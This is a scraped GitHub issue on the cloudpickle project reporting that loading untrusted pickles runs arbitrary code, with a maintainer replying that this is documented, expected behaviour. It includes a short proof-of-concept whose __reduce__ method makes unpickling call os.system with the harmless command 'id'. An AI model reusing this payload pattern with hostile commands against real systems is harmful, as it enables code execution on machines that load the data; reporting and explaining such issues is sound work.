Deserialising Untrusted Data in loads() leads to Arbitrary Code Execution.

cloudpipe / cloudpickle

Extended pickling support for Python objects

Other

1.64k stars 167 forks source link

Deserialising Untrusted Data in loads() leads to Arbitrary Code Execution. #512

Closed ajmalabubakkr closed 1 year ago

ajmalabubakkr commented 1 year ago

#poc.py
import cloudpickle
import os
class RCE:
    def __reduce__(self):
        cmd = ('id')
        return os.system, (cmd,)

if __name__ == '__main__':
    with open('pickle.pkl','wb') as pkl:
        a=pkl.write(cloudpickle.dumps(RCE()))
        print("[+] Hit")
    with open("pickle.pkl","rb") as pkl_file:
        print("[+] Hit 2")
        p = cloudpickle.load(pkl_file)
        print("[+] Hit 3")

POC

Description

Cloud pickle inherits the same dangerous loads function from normal pickle module.

ogrisel commented 1 year ago

This is expected as cloupickle is an extension of the regular pickle module. Its main purpose is to ship arbitrary code between workers of a distributed computing cluster (such as dask, ray, pyspark...).

This is all documented in the readme of the project:

https://github.com/cloudpipe/cloudpickle#cloudpickle

Furthermore, the cloupickle.loads function is just a convenience alias to the pickle.loads function of the standard library.